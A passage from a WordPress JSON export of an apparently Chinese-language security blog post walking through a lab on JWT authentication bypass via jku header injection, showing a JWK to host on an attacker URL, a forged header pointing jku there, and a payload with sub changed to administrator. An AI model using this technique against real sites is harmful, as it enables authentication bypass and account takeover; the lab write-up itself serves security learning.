class=\"wp-block-heading\">step\uff12.\u5c07\u516c\u9470\u8cbc\u5230\u653b\u64ca\u4e3b\u6a5f\u4e0a<\/h3>\n\n\n\n<p>\u7136\u5f8c\u9ede\u9078\u525b\u7522\u751f\u7684key\u9078\u64c7<code>Copy Public Key as JWK<\/code>\uff0c\u63a5\u8457\u8cbc\u5230\u653b\u64ca\u4e3b\u6a5f\u4e0a( https:\/\/attackhost\/exploit )\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>{\n    \"keys\": &#91;\n        {\n            \"kty\": \"RSA\",\n            \"e\": \"AQAB\",\n            \"kid\": \"492b828a-556c-4cdd-b1f3-513c2d7bf28c\",\n            \"n\": \"yy1wpYmffgXBxhAUJzHHocCuJolwDqql75ZWuCQ_cb33K2vh9mk6GPM9gNN4Y_qTVX67WhsN3JvaFYw\"\n        }\n    ]\n}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">step3.\u4f7f\u7528JKU\u91cd\u7c3d\u540d<\/h3>\n\n\n\n<p>\u5230<code>JWT editor<\/code>\u5c07token\u7684header\u505a\u4fee\u6539\uff0ckid\u8981\u63db\u6210\u525b\u525b\u65b0\u5efakey\u7684kid\uff0cjku\u8981\u6307\u5b9a\u653b\u64ca\u7db2\u5740\uff0c\u5982\u4e0b\uff0c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>{\n\t\"kid\": \"<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">492b828a-556c-4cdd-b1f3-513c2d7bf28c<\/mark>\",\n\t\"alg\": \"RS256\",\n\t\"jku\": \"<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">https:\/\/attackhost\/exploit<\/mark>\"\n}<\/code><\/pre>\n\n\n\n<p>\u5728payload \u7684\u90e8\u4efd\uff0c\u628asub\u7684\u5167\u5bb9\u6539\u70baadministrator\u3002<\/p>\n\n\n\n<p>\u7136\u5f8c\u5728\u4e0b\u65b9\u6309\u4e0b<code>sign<\/code>\uff0c\u63a5\u8457\u9078\u64c7\u525b\u525b\u7522\u751f\u7684RSA key\uff0c\u78ba\u4fdd<code>Don't modify header<\/code>\u9078\u9805\u88ab\u52fe\u9078\u5f8c\uff0c\u5c31\u6309\u4e0b\u78ba\u8a8d<code>OK<\/code><\/p>\n\n\n\n<p>\u6b64\u6642\u8a72token\u5c31\u5df1\u91cd\u7c3d\u540d\u5b8c\u6210\uff0c\u4f7f\u7528\u8a72token\u7b49\u540cadministrator\u8eab\u4efd\u8a2a\u554f\u7db2\u7ad9\u3002<\/p>\n\n\n\n<p>Lab: JWT authentication bypass via jku header injection<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>JWT\u653b\u64ca\u662f\u70ba\u4e86\u9952\u904e\u7db2\u7ad9\u8eab\u4efd\u9a57\u8b49\uff0c\u653b\u64ca\u8005\u6703\u5411\u7db2\u7ad9\u767c\u9001\u4fee\u6539\u5f8c\u7684JWT\uff0c\u76ee\u6a19\u662f\u5192\u5145\u53e6\u4e00\u500b\u8eab\u4efd\u7684\u4f7f\u7528\u8005\u3002\u5982\u679c\u653b\u64ca\u8005\u80fd\u5920\u4f7f\u7528\u4efb\u610f\u503c\u5275\u5efa\u81ea\u5df1\u7684JWT\u6709\u6548\u4ee4\u724c\uff0c\u4ed6\u5011\u80fd\u5920\u5347\u7d1a\u81ea\u5df1\u7684\u6b0a\u9650\u6216\u5192\u5145\u5176\u4ed6\u7528\u6236\uff0c\u5b8c\u5168\u63a7\u5236\u4ed6\u5011\u7684\u5e33\u6236\u3002<\/p>\n","protected":false},"author":1,"featured_media":2390,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/i.imgur.com\/H5ay8Hy.jpg","fifu_image_alt":"jwt attack","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[367],"tags":[],"class_list":["post-1448","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-logic-vulnerabilities"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/i.imgur.com\/H5ay8Hy.jpg?fit=161%2C81&ssl=1","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1448","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1448"}],"version-history":[{"count":1,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1448\/revisions"}],"predecessor-version":[{"id":2389,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1448\/revisions\/2389"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media\/2390"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1448"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1448"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1448"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}